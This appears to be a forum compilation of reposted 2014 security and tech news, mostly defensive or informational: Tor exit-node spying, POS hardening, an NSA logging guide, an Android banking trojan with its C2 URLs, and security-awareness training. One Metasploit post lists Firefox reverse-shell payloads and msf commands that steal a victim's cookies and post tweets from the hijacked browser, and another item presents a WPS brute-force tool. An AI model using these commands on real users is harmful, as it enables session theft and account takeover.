Nytro

Near error-free wireless detection made possible Date: January 23, 2014 Source: University of Cambridge Summary: A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 percent accuracy over a much wider range than current systems. A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 per cent accuracy over a much wider range than current systems. The accuracy and range of radio frequency identification (RFID) systems, which are used in everything from passports to luggage tracking, could be vastly improved thanks to a new system developed by researchers at the University of Cambridge. The vastly increased range and accuracy of the system opens up a wide range of potential monitoring applications, including support for the sick and elderly, real-time environmental monitoring in areas prone to natural disasters, or paying for goods without the need for conventional checkouts. The new system improves the accuracy of passive (battery-less) RFID tag detection from roughly 50 per cent to near 100 per cent, and increases the reliable detection range from two to three metres to approximately 20 metres. The results are outlined in the journal IEEE Transactions on Antennas and Propagation. RFID is a widely-used wireless sensing technology which uses radio waves to identify an object in the form of a serial number. The technology is used for applications such as baggage handling in airports, access badges, inventory control and document tracking. RFID systems are composed of a reader and a tag, and unlike conventional bar codes, the reader does not need to be in line of sight with the tag in order to detect it, meaning that tags can be embedded inside an object, and that many tags can be detected at once. Additionally, the tags require no internal energy source or maintenance, as they get their power from the radio waves interrogating them. "Conventional passive UHF RFID systems typically offer a lower useful read range than this new solution, as well as lower detection reliability," said Dr Sithamparanathan Sabesan of the Centre for Photonic Systems in the Department of Engineering. "Tag detection accuracy usually degrades at a distance of about two to three metres, and interrogating signals can be cancelled due to reflections, leading to dead spots within the radio environment." Several other methods of improving passive RFID coverage have been developed, but they do not address the issues of dead spots. However, by using a distributed antenna system (DAS) of the type commonly used to improve wireless communications within a building, Dr Sabesan and Dr Michael Crisp, along with Professors Richard Penty and Ian White, were able achieve a massive increase in RFID range and accuracy. By multicasting the RFID signals over a number of transmitting antennas, the researchers were able to dynamically move the dead spots to achieve an effectively error-free system. Using four transmitting and receiving antenna pairs, the team were able to reduce the number of dead spots in the system from nearly 50 per cent to zero per cent over a 20 by 15 metre area. In addition, the new system requires fewer antennas than current technologies. In most of the RFID systems currently in use, the best way to ensure an accurate reading of the tags is to shorten the distance between the antennas and the tags, meaning that many antennas are required to achieve an acceptable accuracy rate. Even so, it is impossible to achieve completely accurate detection. But by using a DAS RFID system to move the location of dead spots away from the tag, an accurate read becomes possible without the need for additional antennas. The team is currently working to add location functionality to the RFID DAS system which would allow users to see not only which zone a tagged item was located in, but also approximately where it was within that space. The system, recognised by the award of the 2011 UK RAEng/ERA Innovation Prize, is being commercialised by the Cambridge team. This will allow organisations to inexpensively and effectively monitor RFID tagged items over large areas. The research was funded by the Engineering and Physical Sciences Research Council (EPSRC) and Boeing. Sursa: Near error-free wireless detection made possible -- ScienceDaily

[h=3]Getting Started with WinDBG - Part 1[/h]By Brad Antoniewicz. WinDBG is an awesome debugger. It may not have a pretty interface or black background by default, but it still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you off the ground running. This is part one of a multipart series, here's our outline of whats in store: Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers Part 2 - Breakpoints Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory. [h=1]Installation[/h] Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both. [h=2]Windows 8[/h] For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK) You can install Visual Studio and the WDK or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG. This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you if you'd like to install locally or download the development kit for another computer. The later will be the equivalent of an offline installer, which is my preference so that you can install on other systems easily in the future. From there just Next your way to the features page and deselect everything but "Debugging Tools for Windows" and click "Download". Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then next through that install. Then you're all ready to go! [h=2]Windows 7 and Below[/h] For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .Net Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option. My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer which makes future debugging efforts a heck of lot easier. That's what I'll do here. Once the installation completes, you'll should have the redistributable for various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory. From there the installation is pretty simple, just copy the appropriate redistributable to the system you're debugging and then click through the installation. Articol complet: http://blog.opensecurityresearch.com/2013/12/getting-started-with-windbg-part-1.html

Who is spying on Tor network exit nodes from Russia? by paganinip on January 23rd, 2014 Researchers Winter and Lindskog identified 25 nodes of Tor network that tampered with web traffic, decrypted the traffic, or censored websites. Two researchers, Philipp Winter and Stefan Lindskog of Karlstad University in Sweden, presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior, it has been discovered that a not specified Russian entity is eavesdropping nodes at the edge of the Tor network. The researchers used a custom tool for their analysis and they discovered that the entity appeared to be particularly interested in users’ Facebook traffic. Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. On the overall nodes compromised, 19 were tampered using a man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly. Tor network anonymizes user’s web experience, under specific conditions, bouncing encrypted traffic through a series of nodes before accessing the web site through any of over 1,000 “exit nodes.” The study proposed is based on two fundamental considerations: User’s traffic is vulnerable at the exit nodes. For bad actors, the transit through an exit node of the traffic exposes it to eavesdrop. Very popular was the case of WikiLeaks, that was initially launched with documents intercepted from Tor network eavesdropping on Chinese hackers through a bugged exit node. Tor nodes are run by volunteers that can easily set up and taken down their servers every time they need and want. The attackers in these cases adopted a bogus digital certificate to access traffic content, for the remaining 6 cases it has been observed that impairment resulted from configuration mistakes or ISP issues. The study revealed that the nodes used to tamper the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity. The researchers passive eavesdropped on unencrypted web traffic on the exit nodes, by checking the digital certificates used over Tor connections against the certificates used in direct “clear-web sessions”, they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers control the Russian nodes access to the traffic and re-encrypt it with their own self-signed digital certificate issued to the made-up entity “Main Authority.” It appears as a well-organized operation, the researchers noted that blacklisting the “Main Authority” Tor nodes, new ones using the same certificate would set-up by the same entity. It is not clear who is behind the attack, Winter and Lindskog believe that the spying operation was conducted by isolating individuals instead government agency because the technique adopted is too noisy, the attackers used a self-signed certificate that causes browser warning to Tor users. “It was actually done pretty stupidly,” says Winter. It must be also considered that Intelligence agencies, including the NSA are spending a great effort to infiltrate the Tor network, one of the documents leaked by Edward Snowden on the US surveillance expressly refers a project, codenamed Tor Stinks, to track profiles in the deep web. Despite the high interest in Tor networks and its potentialities, the network is considerably the best way to protect user’s anonymity online, and governments don’t want this. Pierluigi Paganini (Security Affairs – Tor network, Russia) Sursa: Who is spying on Tor network exit nodes from Russia?

Retrieve WPA/WPA2 passphrase from a WPS enabled acess point. [h=1]OVERVIEW[/h] Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture. Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success. Source: https://github.com/bdpurcell/bully

[h=1]PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB[/h] January 25th, 2014, 14:45 GMT · By Silviu Stahie - PHP logo PHP, an HTML-embedded scripting language with syntax borrowed from C, Java, and Perl, with a couple of unique PHP-specific features thrown in, has been updated to version 5.6.0 Alpha 1. PHP 5.x includes a new OOP model based on the Zend Engine 2.0, a new extension for improved MySQL support, built-in native support for SQLite, and much more. According to the changelog, constant scalar expressions have been implemented, variadic functions have been added, and argument unpacking have been added. Also, support for large(>2GiB) file uploads has been added, SSL/TLS improvements have been implemented, and a new command line debugger called phpdbg is now available. You can check out the official changelog in the readme file incorporated in the source package for more details about this release. Download PHP 5.6.0 Alpha 1 right now from Softpedia. Sursa: PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB

Spotting the Adversary with Windows Event Log Monitoring Author: National Security Agency/Central Security Service Contents 1 Introduction ................................................................................................................ .......................... 1 2 Deployment................................................................................................................... ........................ 1 2.1 Ensuring Integrity of Event Logs ................................................................................................................... 2 2.2 Environment Requirements ...................................................................................................... ................... 3 2.3 Log Aggregation on Windows Server 2008 R2 ............................................................................................. 4 2.4 Configuring Source Computer Policies .......................................................................................... ............... 9 2.5 Disabling Windows Remote Shell ................................................................................................ ............... 15 2.6 Firewall Modification ......................................................................................................... ........................ 15 2.7 Restricting WinRM Access ...................................................................................................... .................... 18 2.8 Disabling WinRM and Windows Collector Service ..................................................................................... 19 3 Hardening Event Collection................................................................................................... .............. 20 3.1 WinRM Authentication Hardening Methods ............................................................................................. 20 3.2 Secure Sockets Layer and WinRM .............................................................................................................. 24 4 Recommended Events to Collect ........................................................................................................ 24 4.1 Application Whitelisting ...................................................................................................... ....................... 25 4.2 Application Crashes ........................................................................................................... ......................... 25 4.3 System or Service Failures .................................................................................................... ...................... 25 4.4 Windows Update Errors ......................................................................................................... .................... 26 4.5 Windows Firewall .............................................................................................................. ......................... 26 4.6 Clearing Event Logs ........................................................................................................... ......................... 26 4.7 Software and Service Installation ............................................................................................. .................. 27 4.8 Account Usage ................................................................................................................. .......................... 27 4.9 Kernel Driver Signing ......................................................................................................... ......................... 28 4.10 Group Policy Errors ........................................................................................................... ......................... 29 4.11 Windows Defender Activities ..................................................................................................................... 29 4.12 Mobile Device Activities ...................................................................................................... ....................... 30 4.13 External Media Detection ...................................................................................................... .................... 31 4.14 Printing Services ............................................................................................................. ............................ 32 4.15 Pass the Hash Detection........................................................................................................ ..................... 32 4.16 Remote Desktop Logon Detection ................................................................................................ ............. 33 5 Event Log Retention ......................................................................................................... ................... 34 6 Final Recommendations........................................................................................................ .............. 35 7 Appendix .................................................................................................................... ......................... 35 7.1 Subscriptions ................................................................................................................. ............................. 35 7.2 Event ID Definitions .......................................................................................................... .......................... 37 7.3 Windows Remote Management Versions.................................................................................................. 38 7.4 WinRM 2.0 Configuration Settings ............................................................................................................. 40 7.5 WinRM Registry Keys and Values ................................................................................................ ............... 43 7.6 Troubleshooting ............................................................................................................... .......................... 44 8 Works Cited ................................................................................................................. ........................ 48 Download: http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf

Improving the Human Firewall Introduction Most likely you will agree that security education is the thing that needs enhancement the most in companies worldwide – it is pointless to expend millions of dollars on the most recent software and hardware to defend the corporate networks against all kinds of internal and external threats only to get your systems exposed because an employee was tricked into divulging his credentials, just as Kevin Mitnick stated. The saying goes: “A chain is only as strong as its weakest link” and it is tightly related to information security as attackers test all possible points of access for vulnerabilities and usually choose the least resistant one. A report from Wisegate, a peer-based IT knowledge service, states that the threat from inner computer users is one of the biggest concerns when it comes to protecting corporate data. Furthermore, Wisegate claim that user security awareness was a top concern in 2013. Most companies already do training and have a relatively high expenditure on computer-based training programs. These trainings just do not prove as efficient as they are planned to be. The key issue here is to differentiate between training and education – training employees involves actions while educating them involves results. The main goal of security awareness programs has to be aimed not at training the staff but at educating them and making them aware of the ways human psychology can be exploited. Hence, you need to bring effective results on the table instead of performing more and more actions. To achieve these results you need to make your staff grasp the concepts you are teaching them to the extent that it permits them to act properly when confronted with new situations. This means that your staff has to internalize the knowledge and information provided by your security awareness program. This cannot be achieved merely by conducting training, leaving notes and hanging up posters. Isn’t the average Internet user already aware of the security issues that he might be confronted with? To illustrate our point, we looked at the trends in Google search for the following keywords: The following results were shown: The results show that the trend of the search volumes for malware and phishing is highly inelastic (static). Compared to the search queries for keygens and torrents, the relative search volume of phishing and malware is quite small between 2004 and 2007. There is no data for the word social engineering for most periods due to its low demand. We see from the red and purple curve above that between 2004 and 2007 many Internet users demanded keygens and torrents to get illegal access to paid software (at a generally declining rate) but their awareness of possible implications of keygens such as malware and social engineering remained relatively stagnant. From year 2008 up to now we see a slight increase in the search tendency for malware and phishing while the query tendency for keygen and torrents have been falling at an increasing rate and the forecast is that the queries for keygens and maybe torrents are going to fall below those of malware and phishing. Still, we can see that security awareness has had some impact on the behavior of Internet users, making them stray from the dark side of the Internet. Nonetheless, this decline of piracy and risky behavior is also due to other reasons such as better enforcement of copyright laws, removal of access to websites with illegal contents by ISPs, closure of online businesses operating in the grey market by governments, inter alia. However, if we compare the queries for torrents with the queries for virus and antivirus we get a pretty interesting picture. It appears that nowadays antivirus is as demanded a keyword as virus and more demanded than keygen, torrents, social engineering, phishing, malware. It appears that the end-users rely not on prevention but on post-infection treatment as a safety mechanism. Also, the keywords virus and anti-virus are more trending than torrents and multiple times more popular than social engineering, phishing and malware which pinpoints the low safety precautionms of the average Internet user as responsibilities for Web safety appear to end with installing anti-virus software and ignoring the safe use of the Internet. Related queries for “virus” appear to be “anti virus”, “virus download”, “antivirus”, “virus scan”, “free anti virus”, “avg”, “avg virus”, “virus removal”, “virus protection”, among others which show the overall direction of the users’ input in terms of the keyword “virus”. We can conclude from the above illustrations that the need for Web safety and security awareness is as high as ever pinpointing the need for ameliorating the current security awareness programs that companies undertake. If I have to educate and not train, what should I change? Firstly, you should start by organizing group lunches with a security-oriented purpose. Each employee would appreciate a good lunch and/or dessert so the attendance of such meetings will be high. Such an informal meeting is a great way to get your staff together and talk about security issues. Most likely, organizing lunches once or twice a week for different groups will raise the security awareness of your staff without having to resort to dry lectures but by resorting to overall participation and group-wide discussion instead. In these lunches, you can begin to sort out regular attendees who have the potential to become champions within the different work groups and who can later on help educate the other employees in their group. Secondly, you can try to bring in outside security professionals as they are usually eager to get CPEs (continuing professional education) credits, even more if you add some goodwill gesture. The local security pros may present security issues or discuss security with your employees. Thirdly, you should provide your employees information on maintaining Internet safety at home. Such discussions are always well-attended, even more so if you show them something relevant to them such as how to keep kids safe at home. The information must really affect them personally and they must find it relevant to make them focused and engaged so that they can absorb it. Links, whitepapers and any kind of training on such topics would be well-accepted. Fourthly, you should make appointments with business unit leaders to discuss security issues and topics relevant to their area. It does not have to be in the office, more informal settings are also beneficial. The point here is that it is important to show them that you are pondering over their problems and attempting to remedy them, in this way they can understand and help with your concerns as well. Fifthly, the old way of hanging posters on the wall and dispersing newsletters can also be efficient. The posters have to be attention-grabbing and have to be replaced frequently. A column in a newsletter would be beneficial if it is interesting and relevant. Tips are usually not interesting and relevant as they are self-serving unless they provide some advice on safety at home which automatically makes them relevant. Sixthly, anecdotes and metaphors may help spread the word. For instance, you can rely on the story of Ali Baba to teach the staff about password security, strength and shoulder surfing. Seventhly, create a security mentoring/tutoring option. It is possible that nobody sign up for it but if someone does you should enable him to take advantage of such an option. The mentoring may include one-on-one sessions and would help in pinpointing gifted employees as regards to security awareness and would help shape a champion among your employees who would educate the others during the course of work. Eightly, you should offer your employees ride-alongs whereby you give them the opportunity to take a look at how the IT or security program actually looks like from the inside. The opposite should be done as well – making IT and security staff take a glimpse of how a day in the workplace of the employees looks like may also be useful. Finally, you should strive to create an environment of teamwork as it is proven that good teamwork has several positive features that come with it, such as: Better problem solving capabilities Quicker completion of tasks Competition which leads personnel to excel at what they do Bringing a combination of different unique qualities on the table may lead to better efficiency in the employees’ decision-making (references as regards these four features can be found at the bottom of the article) As Henry Ford once said “Coming together is a beginning. Keeping together is progress. Working together is success.” Testing the human firewall Testing the human firewall is easy so you can effortlessly track the company’s progress. The first and most employed way to test the human firewall is through written tests which come in the form of online multiple-choice tests and usually take place after a computer-based learning session. Alternatively, you can test the human firewall with a seemingly real social engineering attack. You have various techniques at your disposal for the attack: pretexting, phishing, theft with diversion, tailgating, quid pro quo or any combination of these. You can resort to websites such as phishme.com to fake a phishing campaign against your company, do the attack yourself or hire external security professionals to raise the bar even higher. Below are 3 sample questions that may be used in multiple-choice tests and 3 open questions that require written answer. Similar questions can be used when testing your personnel’s security awareness. What are some important tips when it comes to improving the human firewall? Simple labels that classify data as protected and unprotected such as “confidential” and “public” are a great place to start. Prohibiting password reuse and teaching the human firewall good password habits is crucial. The security staff has to become more accessible to the employees. This, on its own, will motivate the latter to share their problems and ask questions, on the one hand, and will aid the security staff in assessing the efficiency of their security programs, on the other hand. When reporting the results from security awareness tests, it is preferable to share them either anonymously or statistically. Though, if negative trends arise from particular employees or groups of employees, share those results with the proper persons and attempt to solve those issues without putting any blame on the people who fall behind with their security education. Teach employees not to store any company data on their smartphone Teach personnel not to connect USB drives, external hard disks or any writeable media to the workplace computer To reduce social engineering attacks against your employees, limit the information that can be gathered about your employees during the reconnaissance stage of the attack (this involves educating them not to divulge too much about information about themselves in the public domain) Remove any organization charts which reveal the employees names, job positions and photos from the company’s public website. Teach the personnel to handle external contacts properly through systematic training. Teach the personnel not to respond to accusations instantaneously but to turn to colleagues, legal staff, etc. before handling complaints. Teach personnel to limit the information they provide in social networks and other public domain sources such as Facebook. Conclusion It can be concluded from our discussion above that attempts at improving the human firewall have already started worldwide. Their success varies depending on factors such as the preliminary awareness of the factors, the enforceability and rigidity of the laws in the particular country, inter alia. Most methods of improving the human firewall involve modifying strategies that are already taking place in the companies such as transforming the type of information delivered to employees into a way that makes it relevant to the employees and that makes it affect them personally or transforming posters and newsletters in a way that excludes any tips and includes anecdotes and metaphors which will encourage the employees to read these advices and ease them in remembering the rules, whereas some involve a totally new strategy for some companies – like performing ride-alongs so the IT staff can better understand the other employees and vice-versa. We have also seen that testing the results from such security awareness education does not take a lot of effort but it is highly valuable as it can reveal the weak spots or the weakest links of your human firewall. Finally, we have provided some advices that resolve relatively recent issues that have emerged as regards to the operation of the human firewall. For instance, prohibiting the storage of company data on smartphones is a one possible solution to the BYOD problem that has emerged only recently. References: Richard O’Hanley, James S. Tiller and others, ‘Information Security Management Handbook, 6th edition, Volume 7? Munir Kotadia, “‘Human firewall’ a crucial defence: Mitnick”, Apr 14, 2005, Available at: 'Human firewall' a crucial defence: Mitnick | ZDNet Laneye, ‘Managers under attack’, Available at: Social Engineering - Managers under attack Business Wire, ‘New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013?, Jan 23, 2013, Available at: New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013 | Business Wire University of California, MERCED, ‘Security Self-Test: Questions and Scenarios’, Available at: Security Self-Test: Questions and Scenarios | Information Technology Ken Hess, ‘The second most important BYOD security defense: user awareness’, Feb 25, 2013, Available at: The second most important BYOD security defense: user awareness | ZDNet LePine, Jeffery A., Ronald F. Piccolo, Christine L. Jackson, John E. Mathieu, and Jessica R. Saul (2008). “A Meta-Analysis of Teamwork Processes: Tests of a Multidimensional Model and Relationships with Team Effectiveness Criteria”. Personnel Psychology 61 (2): 273–307. Hoegl, Martin, and Hans Georg Gemuenden (2001). “Teamwork Quality and the Success of Innovative Projects: a Theoretical Concept and Empirical Evidence”.Organization Science 12 (4): 435–449 By Ivan Dimov|January 24th, 2014 Sursa: Improving the Human Firewall - InfoSec Institute

New Metasploit Payloads for Firefox Javascript Exploits Posted by joev in Metasploit on Jan 23, 2014 3:57:54 PM Those of you with a keen eye on metasploit-framework/master will notice the addition of three new payloads: firefox/shell_reverse_tcp firefox/shell_bind_tcp firefox/exec These are Javascript payloads meant for executing in a privileged Javascript context inside of Firefox. By calling certain native functions not meant to be exposed to ordinary web content, a classic TCP command shell can be opened. To a pentester, these payloads are useful for popping platform-independent in-process shells on a remote Firefox instance. How does it work? Firefox contains a Javascript API called XPCOM which consists of privileged native methods primarily implemented as C++ bindings. This API is commonly invoked by Firefox Addons and is also used by the "glue" code running inside the Firefox browser itself. If you can find a way to run Javascript code with access to XPCOM - either by convincing the user to install an untrusted addon or by finding a privilege escalation exploit in Firefox itself - you can open a raw TCP socket and run executables with Javascript. By using some shell redirection, we can get a working command shell connection back to a metasploit instance. We currently have three Firefox privilege escalation exploits in the framework: exploit/multi/browser/firefox_svg_plugin (Firefox 17.* + Flash) exploit/multi/browser/firefox_proto_crmfrequest (Firefox 5-15.*) exploit/multi/browser/firefox_xpi_bootstrapped_addon (all versions) Why is it better? The Javascript payloads are able to maintain shell sessions without dropping a native exe to the disk, which makes their presence significantly harder to detect. Another immediate benefit is that our existing Firefox exploits can now be included in BrowserAutopwn, since the target is static. Additionally, since the payload still has access to the Firefox Javascript environment, we can just as easily eval Javascript code, which makes things like cookie extraction or XSS attacks very easy. As an example I wrote a post module, post/firefox/gather/xss. To use it, simply specify the URL you want to run under and specify a SCRIPT option. The SCRIPT will be eval()'d by the payload and any results will be printed: msf> use post/firefox/gather/xss msf> set SESSION 1 msf> set URL https://rapid7.com msf> set SCRIPT "send(document.cookie);" [+] id=f612814001be908ds79f Or, with a slightly more advanced script which sends a tweet in the target browser: msf> set URL https://twitter.com msf> set SCRIPT "$('.tweet-box').find('.tweet-box').focus().text('Metasploit Courtesy Tweet').parents('form').find('.tweet-button button').click(); return 'sent';" [+] sent Note: You can use return or send to send back data, but you can only send once. If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. Sursa: https://community.rapid7.com/community/metasploit/blog/2014/01/23/firefox-privileged-payloads

Tech Insight: Defending Point-of-Sale Systems John H. Sawyer US-CERT publishes advice on defending POS systems against attacks like those against Target, Neiman Marcus. Major hacks at retailers that include Target and Neiman Marcus have put a new spotlight on the security of point of sale (POS) systems. What may come as a surprise to some is that the memory-scraping malware attacks were nothing new. Last year, Visa published two "Visa Data Security Alerts" warning merchants of an increase in attacks targeting credit card data with specific references to memory-scraping malware. The alerts were published in April and August. The first stated that Visa has seen an increase in network intrusions involving grocery merchants since January 2013. August's update used nearly the same verbiage but mentioned retail instead of grocery. The part that's of particular interest is how the attackers were carrying out the attacks. "Once inside the merchant's network, the hacker will install memory parser malware on the Windows based cash register system in each lane or on Back-of-the-House (BOH) servers to extract full magnetic stripe data in random access memory (RAM)." With two notices earlier in the year, retailers breached in the 4th quarter had early notification that attacks specifically targeting POS systems had been seen increasing. The alerts from Visa even included details on how to protect POS and related PCI systems from the types of attacks being carried out. So how is it that companies who were considered PCI compliant had their POS devices and PCI environment compromised? From a penetration tester's perspective, it is all too common to find merchants considered compliant as not necessarily secure. As an industry, we've been saying for years that compliance does not equal security and these big data breaches are classic examples. It is easy to fill out a form that certain controls are in place, but the harsh reality is that rarely are those controls actually tested thoroughly to ensure their effectiveness at protecting cardholder data. US CERT, part of the Department of Homeland Security, issued Alert TA14-002A on January 2, 2014 titled "Malware Targeting Point of Sale Systems." The document discusses hardware and software attacks against POS systems and includes specific recommendations on protecting them. Unlike the Visa Alerts, US CERT has put together guidance that focuses specifically on security best practices without mentioning specialized hardware and software (i.e. EMV-enabled PIN-entry, SRED-enabled devices, PA-DSS compliant payment applications). Alert TA14-002A targets 6 areas that POS administrators should follow: Use Strong Passwords: During the installation of POS systems, installers often use the default passwords for simplicity on initial setup. Unfortunately, the default passwords can be easily obtained online by cybercriminals. It is highly recommended that business owners change passwords to their POS systems on a regular basis, using unique account names and complex passwords. Default passwords are the low-hanging fruit that penetration testers tend to go for first. It's amazing how often network devices and application servers are set up on a network with default passwords in place. Whether it's an administration interface for Apache Tomcat or something like HSRP for Cisco routers, it's difficult to find a network that doesn't have at least one system with a default password. A vulnerability scanner like Nessus or NeXpose can help with finding these default passwords, but manual verification should be done also, as vulnerability scanners don't have the default passwords for every device. Update POS Software Applications:Ensure that POS software applications are using the latest updated software applications and software application patches. POS systems, in the same way as computers, are vulnerable to malware attacks when required updates are not downloaded and installed on a timely basis. Keeping POS applications updated should be part of the patch management strategy for every merchant. The common hurdle is that new versions generally cost money, which causes companies to avoid upgrades until technical problems arise. While the risks to POS software can sometimes be mitigated through other security controls like host intrusion prevention software (HIPS) and firewalls, it's important that merchants remember that new versions also bring security and bug fixes that can help keep cardholder data safe -- they'll need to bite the bullet eventually and upgrade. Install a Firewall: Firewalls should be utilized to protect POS systems from outside attacks. A firewall can prevent unauthorized access to, or from, a private network by screening out traffic from hackers, viruses, worms, or other types of malware specifically designed to compromise a POS system. A key tenet of the PCI DSS is network segmentation and firewalls are essential. Host- and network-based firewalls should be utilized as part of a layered security approach. Traffic should only be allowed to and from the POS to systems that are similarly hardened against attack. Where possible, the traffic should also be monitored by an intrusion detection/prevention system to detect and/or prevent attacks. Use Antivirus: Antivirus programs work to recognize software that fits its current definition of being malicious and attempts to restrict that malware's access to the systems. It is important to continually update the antivirus programs for them to be effective on a POS network. US-CERT is on target with its advice to use updated antivirus, but anti-malware protections should not stop there. Merchants should consider implementing a full endpoint protection suite that includes antivirus, HIPS, firewall, traffic inspection, and application whitelisting. While these solutions are not foolproof, they raise the bar for exploitation considerably. Restrict Access to Internet: Restrict access to POS system computers or terminals to prevent users from accidentally exposing the POS system to security threats existing on the Internet. POS systems should only be utilized online to conduct POS-related activities and not for general Internet use. Unless the POS application specifically needs Internet access, then it should be completely firewalled off from the Internet. In the situation that the POS software does need to communicate with systems on the Internet, firewalls should be used to strictly block all traffic except that to authorized systems. Application proxies should be used to proxy and inspect traffic to and from the Internet. Disallow Remote Access: Remote access allows a user to log into a system as an authorized user without being physically present. Cybercriminals can exploit remote access configurations on POS systems to gain access to these networks. To prevent unauthorized access, it is important to disallow remote access to the POS network at all times. This is the only area of advice from US-CERT that might be considered overkill, as it's going to make authorized remote management impossible. With proper firewall configurations restricting access only to authorized management workstations and multi-factor authentication, remote access is perfectly acceptable. Of course, this is where companies get in trouble as they aren't always diligent in ensuring firewalls configurations are correct and the machines accessing them are secured. POS systems are not difficult to secure if merchants would simply follow the advice that has been put out by Visa and the US-CERT. Most of the advice is based on security best practices that have been around for years. Unfortunately, it often takes a data breach for companies to have their eyes opened to the impact their negligence can have on their customers and their brand. Will Target, Neiman Marcus, and other retailers' recent troubles be the impetus companies need to secure their systems or will they have to experience it firsthand? Sursa: Tech Insight: Defending Point-of-Sale Systems -- Dark Reading

Discovered first Win trojan to serve banking Android malware on mobile by paganinip on January 25th, 2014 Symantec experts recently came across a Windows malicious code that attempts to infect connected Android devices serving an Android malware. Researchers at Symantec antivirus firm have discovered a malicious code that is able to infect Android mobile device with a banking malware during synchronization. The Android malware that was designed to hit Windows user could compromise user’s Smartphone during file transfer, device syncing and backup management operation. The infection process starts with a trojan, dubbed by security experts Trojan.Droidpak, that drops a malicious DLL and it registers it as a system service. Droidpak then downloads a configuration file from the following remote server: http://xia2.dy[REMOVED]s-web.com/iconfig.txt The file contains the information to download a malicious APK and storing it to the following location on the infected PC: %Windir%\CrainingApkConfig\AV-cdk.apk The Android malware detected by the analysts seems to be specifically designed for the Korean population because the malicious APK searches for certain Korean online banking applications on the infected device. The communication between the mobile device and the compromised PC is realized by a software bridge called Android Debug Bridge (ADB), it is a command line tool that allows the malicious code to execute commands on Android Smartphone connected to the infected computer. The Android Debug Bridge is a legitimate tool included in the Android software development kit (SDK), when victim connect an Android device having USB debugging Mode enabled, it launches installation process and infect the Smartphone dropping the Android Malware. Once the Android malware has infected the device, it installs an app that will appear as a Google App Store. Android is the most targeted OS by cyber criminals because its large diffusion, numerous families of malware were created in 2013 to hit mobile users and an increasing number of hack tools was available in the underground to hack such powerful platform. The peculiarity of Trojan.Droidpak is that for the first time a Windows malware was used to install a banking trojan on a mobile device. The banking trojan, dubbed as Android.Fakebank.B, implements common features of this category of malware, including SMS interception and “MITM capabilities”. Researchers at Symantec discovered that the Android.Fakebank.B malware sends back data to the following attacker’s server: http://www.slmoney.co.kr[REMOVED] The experts provided a few suggestions to protect the user’s system from the Android malware while connecting to a windows based computer: Turn off USB debugging on your Android device, when you are not using it Avoid connecting your droid with public computers Only Install reputable security software Keep your System, Softwares and Antivirus up-to-date. Pierluigi Paganini (Security Affairs – Android Malware, Banking trojan) Sursa: https://www.facebook.com/

Why Google Android software is not as free or open-source as you may think Basic Android software may be free, but it doesn’t include the apps that make up Google’s mobile services Android software is free and open-source, but without Google Play, a device will have minimal functionality. Photograph: Beawiharta/Reuters Charles Arthur and Samuel Gibbs Thursday 23 January 2014 16.44 GMT • This article was amended on 24 January 2014 to reflect a clarification from Google that it does not charge manufacturers for Android licenses. The idea that Google’s Android mobile software is both “free” and open-source is so often repeated that it is virtually an article of faith online. There’s only one problem: neither is strictly true. While the basic Android software is indeed available for free, and can be downloaded, compiled and changed by anyone, it doesn’t include the apps that make up Google’s mobile services - such as Maps, Gmail, and crucially Google Play, which allows people to connect to the online store where they can download apps. Without them, a device has only minimal functionality. To get the key apps, a manufacturer needs a “Google Mobile Services” (GMS) licence. GMS licences are issued on a per-model basis. While Google does not charge a fee for the licence, one of the integral steps in the licence-application process requires payment to authorised Android-testing factories. These factories, which include Foxconn and Archos, charge a fee for carrying out the testing required to obtain a GMS licence, which the Guardian understands is negotiated on a case-by-case, per-manufacturer basis. Google activates more than 1 million devices with GMS licences every day The Guardian understands that in one example, testing costs $40,000, payable 50% up front and 50% at the completion of testing for a model with an expected run of at least 30,000 units. The source said Google and its testing partners were being intentionally vague about the fact that a cost is associated with acquisition of a GMS licence, even if the licence itself is free. “It is a lot of money they make, but you can’t see it anywhere because that would tarnish their ‘Android open-source’ karma,” the source said. However, there’s no definitive price list for GMS licence process; the authorised testing factories are understood to vary this depending on the number of devices being ordered and the size of the manufacturer or retailer. “Deals are done on an individual basis and are very opaque,” one source in the Android device community, who didn’t want to be identified, told the 